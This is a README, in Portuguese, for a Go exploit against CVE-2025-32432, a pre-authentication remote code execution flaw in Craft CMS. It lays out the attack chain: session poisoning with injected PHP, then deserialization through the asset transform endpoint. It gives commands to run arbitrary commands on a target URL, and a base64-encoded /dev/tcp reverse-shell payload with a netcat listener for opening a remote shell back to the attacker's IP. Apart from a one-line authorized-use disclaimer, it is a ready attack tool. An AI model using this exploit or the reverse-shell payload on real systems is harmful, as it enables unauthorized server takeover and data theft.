## https://sploitus.com/exploit?id=18B174F3-C5E6-5036-8D2B-764CFB286D12
# CVE-2025-32432 — Craft CMS Pre-Auth RCE
Exploit para execução remota de código sem autenticação no Craft CMS, escrito em Go.
Inspirado no trabalho original de [c0gnit00](https://github.com/c0gnit00).
## Como funciona
1. Obtém a sessão PHP e o CSRF token via `GET /admin/login`
2. Envenena o arquivo de sessão PHP injetando código PHP na query string
3. Dispara a desserialização via `assets/generate-transform` para incluir e executar o arquivo envenenado
## Uso
```bash
go run main.go -u -c
```
| Flag | Descrição | Obrigatório |
|------|-----------|-------------|
| `-u` | URL alvo (ex: `http://target.com`) | Sim |
| `-c` | Comando a executar (ex: `id`, `whoami`) | Sim |
## Exemplo
```bash
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
```
## Reverse Shell
**1. Gere o payload em base64 com seu IP e porta:**
```bash
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
```
**2. Abra o listener:**
```bash
nc -lvnp 4444
```
**3. Execute o exploit com o payload:**
```bash
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
```
> Substitua o valor em base64 pelo gerado no passo 1 com o seu IP real.
## Aviso
Para uso exclusivo em ambientes autorizados e testes de segurança controlados.